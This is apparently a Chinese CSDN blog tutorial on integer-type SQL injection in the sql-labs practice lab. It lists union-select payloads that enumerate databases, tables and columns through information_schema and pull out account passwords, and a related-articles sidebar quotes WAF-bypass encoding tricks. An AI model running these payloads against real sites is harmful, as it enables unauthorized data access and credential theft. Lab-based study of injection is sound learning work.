在不来学sql注入就要失传了

最新推荐文章于 2024-05-26 21:07:50 发布
最新推荐文章于 2024-05-26 21:07:50 发布
阅读量622 收藏
点赞数
分类专栏: sql渗透 文章标签: php
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_58817560/article/details/124412139
版权

前几天写了一个文章结果。。。。。

今天开始我们一起学sql注入 ,学习之前需要大家已经搭建完sql-labs、

sql注入整形注入

sql注入的三要素都有什么?

进入sql-labs

选择第二关

order by 3

 

探测注入点

页面正常的话继续执行下面
这句话的含义就是看有多少个返回值

union select 1,2,3 %23

判断注入点在什么位置


随后查询所有数据库

 

union select 1,group_concat(schema_name),3 from information_schema.schemata

结果为所有的数据库名称

 

查询某个数据库中所有的表名

union select 1,group_concat(table_name),3 from information_schema.tables where table_schema = database()

结果为当前数据库中所有的表名

 

查询某个数据库中所有的列名

id=-1 union select 1,2,group_concat(column_name) from information_schema.columns where table_name='得到的表名'


结果为当前数据库中所有的列名

 

得到表名列名后即可开始查询数据

id=-1 union select 1,(得到的列名),(得到的列名) from 列名在那个表里就写那个表名


然后就可以得到数据

得到的数据为数据库的账号密码 

网工小东
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
sql注入攻击流量情况
07-18
sql注入攻击流量情况
SQL 注入天书.pdf
08-06
SQL 注入习天书
SQL注入速查表
ww564的博客
11-09 366
过滤and or 十六进制绕过 or ——> o\x72 大小写绕过 Or aNd 双写绕过 oorr anandd urlencode,ascii(char),hex,unicode编码绕过 一些unicode编码举例: 单引号:' %u0027 %u02b9 %u02bc %u02c8 %u2032 %uff07 %c0%27 %c0%a7 %e0%80%a7 关键字内联注释尝试绕所有 /*!or*/ /*!and*/ 左括号过滤 urlencode,ascii(char),hex,unicod
2020年了,还要SQL注入吗?
ve9etable的博客
07-08 1481
本文是SQL注入的笔记和部分总结,详细的写了我认为重要的一些东西 目录 SQL注入漏洞基础 我们为什么要了解SQL注入漏洞 SQL注入原理 注入过程 注入方法 数字型注入 字符型注入 MySQL数据库的使用 MySQL的常用语句 元数据库 常用函数 注入手法 联合查询 案例:利用联合查询获取用户名和密码 报错注入 布尔盲注 延时注入 SQL注入漏洞基础 我们为什么要了解SQL注入漏洞 SQL注入漏洞(SQL Injection)是很高危的漏洞之一,通过OWASP
SQL注入-01】SQL语句基础及SQL注入漏洞原理及分类
m0_64378913的博客
04-23 5543
目录1 SQL注入概述1.1 SQL注入简介1.2 SQL注入原理(掌握)1.3 SQL注入漏洞的危害(掌握)2 SQL注入漏洞分类2.1 注入位置分类(掌握)2.2 注入数据类型分类(掌握)2.3 注入手法分类(掌握)3 SQL语句基础3.1 简介3.2 注释3.3 MySQL 元数据库 information_schema 内容简介3.4 MySQL 常用函数4 总结参考文献 1 SQL注入概述 1.1 SQL注入简介 定义:SQL注入就是指Web应用程序对用户输入数据的合法性没有判断,前端传
有人说SQL注入被淘汰了,请问可以捶他吗???
kali_Ma的博客
07-12 778
上次写了一篇文关于SQL注入的文章,居然有人说SQL注入过时了!!! 前言: 本次用4个有趣的实战案例来分别讲: 狠–常见getshell 快–快速报错注入 准–字符长度100限制下注入 绕–绕福某大安全狗 虽然只有4个实战案例,但真的挺实用、通用哦,当然此次都是站在前辈肩膀上实践总结的可能还不够全,如有分析不足的地方望各位大佬指正! 狠–常见getshell: 实战一:这是一次挖到一个小OA系统的通用管理员弱口令,后台可以执行sql语句并且是sa权限,这运气没谁了哈哈 但可以去edu刷分的大部分目标x
sql注入绕过方法总结
12-19
sql注入绕过方法总结,绕过waf,D盾
sql注入讲解ppt.pptx
08-10
sql注入一些基础知识的讲解
C#防SQL注入代码的三种方法
12-31
对于网站的安全性,是每个... 四:屏蔽SQL,javascript等注入(很是主要的),对于每个文件写是不太可能的。所以要找到对所有文件起作用的办法。我在网上收集了以下3种方法  C#防SQL注入方法一  在Web.config文件中
SQL注入习(无止境越越不会)
qq_52527336的博客
04-09 499
记录
SQL的注入对于安全测试的重要性~
okcross0的博客
09-06 452
当用户点击提交按钮的时候,将会把表单数据提交给validate页面,validate页面用来判断用户输入的用户名和密码有没有都符合要求(这一步至关重要,也往往是SQL漏洞所在)。注意到了没有,我们直接将用户提交过来的数据(用户名和密码)直接拿去执行,并没有实现进行特殊字符过滤,待会你们将明白,这是致命的。正常情况下是如此,但是对于有SQL注入漏洞的网站来说,只要构造个特殊的“字符串”,照样能够成功登录。数据库就会错认为不用用户名既可以登入,绕过后台的验证,已到达注入的目的,同样利用了SQL语法的漏洞。
生命在于习——SQL注入绕过
易水哲的博客
08-17 9119
SQL注入绕过技术已经是一个老生常淡的内容了
生命在于习——SQL注入的博弈
易水哲的博客
08-15 357
SQL注入的理论习。
浅谈SQL注入
野马菲比的博客
12-16 732
SQL注入带来的风险有哪些? SQL注入上得了机器权限,下得了数据库数据。攻击者利用SQL注入漏洞,带来的风险有很多,例如数据库被拖库,管理员和重要人员信息泄露,甚至还有可能通过SQL注入漏洞直接获取webshell或者服务器系统权限等等。 SQL注入有哪些分类呢? 比如按照利用方式分类。常见的注入类型有:盲注,报错注入,time盲注,union注入,内联查询注入,拼接(堆)查询注入。 按照攻击入口分类,可以有get型的SQL注入,post型的注入,cookie型注入,header型SQL注入等。 按照注入
2021年,SQL注入死透了么?
m0_50180963的博客
03-18 1226
原创:小姐姐味道(微信公众号ID:xjjdog) 很长一段时间,我认为后端开发,在安全性方面最容易出问题的地方就在于SQL注入。通过 where 1=1这种魔幻的SQL写法,就可以很容易的对一个存在问题的系统进行攻击,以至于最终演进出sqlmap这样的神器存在。 后来的fastjson刷新了我的认知,这个框架也算是对互联网安全概念的一种推动。连不懂技术的老板,都知道fastjson快的要命,作为程序员安全理念就得到了一次提升。 为什么对sql注入情有独钟?因为开发人员和SQL打交道的地方太多了.
sql-labs靶场环境搭建(手把手保姆级教
最新发布
administratorlws的博客
05-26 846
sql-labs靶场搭建(保姆级手把手教)你来你也行噢!
通过SQLiLabsSQL注入我们到了
06-02
很多关于SQL注入的知识,例如: 1. SQL注入的原理和分类; 2. SQL注入的危害和防御措施; 3. 常见的SQL注入攻击方式和实例分析; 4. 使用工具来检测和利用SQL注入漏洞; 5. 防止SQL注入的最佳实践和技巧。 以上是SQLiLabsSQL注入时会涵盖的内容,当然还有很多其他的知识点需要习。如果您需要更详细的信息,请告诉我您具体想了解哪些方面的内容。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

网工小东

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值